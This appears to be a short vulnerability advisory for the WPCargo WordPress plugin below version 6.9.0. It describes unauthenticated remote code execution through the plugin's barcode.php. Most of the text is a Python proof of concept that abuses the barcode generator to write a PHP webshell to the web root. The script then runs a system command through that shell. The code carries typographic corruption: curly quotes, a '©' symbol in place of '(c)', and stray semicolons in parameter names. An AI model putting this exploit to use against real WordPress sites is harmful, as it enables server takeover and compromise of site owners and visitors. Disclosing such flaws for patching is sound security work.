WPCargo < 6.9.0 - Unauthenticated RCE

The plugin contains a file which could allow unauthenticated attackers to write a PHP file anywhere on the web server, leading to RCE

PoC

import sys import binascii import requests # This is a magic string that when treated as pixels and compressed using the png # algorithm, will cause to be written to the png file payload = ‘2f49cf97546f2c24152b216712546f112e29152b1967226b6f5f50’ def encode_character_code(c: int): return ‘{:08b}’.format©.replace(‘0’, ‘x’) text = ‘’.join([encode_character_code© for c in binascii.unhexlify(payload)])[1:] destination_url = ‘http://127.0.0.1:8001/’ cmd = ‘ls’ # With 1/11 scale, '1’s will be encoded as single white pixels, 'x’s as single black pixels. requests.get( f"{destination_url}wp-content/plugins/wpcargo/includes/barcode.php?text={text}&sizefactor;=.090909090909&size;=1&filepath;=/var/www/html/webshell.php" ) # We have uploaded a webshell - now let’s use it to execute a command. print(requests.post( f"{destination_url}webshell.php?1=system", data={“2”: cmd} ).content.decode(‘ascii’, ‘ignore’))